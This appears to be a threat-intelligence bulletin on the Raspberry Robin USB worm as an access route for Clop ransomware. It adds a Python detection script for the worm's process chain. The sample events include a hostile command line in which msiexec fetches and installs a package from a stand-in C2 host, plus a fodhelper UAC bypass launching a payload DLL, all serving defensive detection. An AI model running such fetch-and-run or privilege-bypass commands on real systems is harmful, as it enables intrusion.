Threat Watch

Raspberry Robin Operators Selling Access To Companies

According to researchers at Microsoft, there has been an uptick in Clop ransomware infections. The group has switched tactics and now uses Raspberry Robin as its main infection vector, whereas previously it relied on phishing campaigns to steal credentials and gain access to organizations. Raspberry Robin is a Windows worm that propagates through removable USB drives. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL, and it uses TOR exit nodes as backup C2 infrastructure. The malware uses cmd.exe to read and execute a file stored on the infected external drive; it then leverages msiexec.exe for external network communication with a rogue domain serving as C2, downloading and installing a DLL library file. msiexec.exe next launches a legitimate Windows utility, fodhelper.exe, which in turn runs rundll32.exe to execute a malicious command. Researchers pointed out that processes launched by fodhelper.exe run with administrative privileges and require no User Account Control prompt.
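The execution chain above (cmd.exe reading a file from the removable drive, msiexec.exe fetching a DLL from a remote domain, fodhelper.exe spawning rundll32.exe) maps cleanly onto process-creation telemetry. The following is an added detection example, not code from Microsoft or from the original bulletin: it runs three rules over a handful of constructed process-creation events modelled loosely on Sysmon Event ID 1 fields and walks the parent chain of any hit. The `REMOVABLE_DRIVES` set, the event field names and all sample paths and domains are assumptions for the demo.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # its command line

# Drive letters an endpoint agent reports as removable media.
# Assumed input for the demo; in practice this comes from device inventory.
REMOVABLE_DRIVES = {"E:"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def image_name(path: str) -> str:
    """Return the lower-cased executable name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events, removable_drives=REMOVABLE_DRIVES):
    """Return (rule_name, pid) findings for the three Raspberry Robin stages."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = image_name(e.image)
        parent = by_pid.get(e.ppid)
        parent_img = image_name(parent.image) if parent else ""
        cl = e.cmdline.lower()

        # Stage 1: cmd.exe executing a file located on a removable drive.
        if img == "cmd.exe" and any(d.lower() + "\\" in cl for d in removable_drives):
            findings.append(("cmd_exec_removable", e.pid))

        # Stage 2: msiexec.exe given an HTTP(S) URL instead of a local package.
        if img == "msiexec.exe" and URL_RE.search(cl):
            findings.append(("msiexec_remote_url", e.pid))

        # Stage 3: the auto-elevating fodhelper.exe spawning rundll32.exe.
        if img == "rundll32.exe" and parent_img == "fodhelper.exe":
            findings.append(("fodhelper_spawns_rundll32", e.pid))
    return findings

def ancestry(events, pid):
    """Walk parent pointers from pid upward; returns image names, child first."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain

# Constructed sample events: one malicious chain plus a benign msiexec run.
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c E:\update.cmd"),
    ProcEvent(300, 200, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /q /i http://rogue-c2.invalid/pkg.msi"),
    ProcEvent(400, 300, r"C:\Windows\System32\fodhelper.exe", "fodhelper.exe"),
    ProcEvent(500, 400, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\Public\payload.dll,Start"),
    ProcEvent(600, 100, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\installs\app.msi"),  # benign local install
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid} chain={' <- '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

Each rule on its own is noisy (administrators do run msiexec against URLs), so the value is in correlating them: a rundll32.exe whose ancestry passes through fodhelper.exe and msiexec.exe back to a cmd.exe reading from removable media is the pattern worth paging on.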


This switch in tactics by the Clop threat group is not uncommon among ransomware groups. Rapidly changing tactics and leveraging dark web Malware-as-a-Service (MaaS) offerings lets threat groups infect companies faster, since they no longer have to wait for a successful phishing campaign. Illicit access is frequently brokered in the underground economy. To mitigate the risk of attacks like Raspberry Robin, a good rule for organizations is to never use USB drives that are not trusted, particularly those of unknown origin. If a USB drive is found lying around, it should be turned in to the security team for evaluation.

Raspberry Robin operators are selling initial access to compromised enterprise networks to ransomware gangs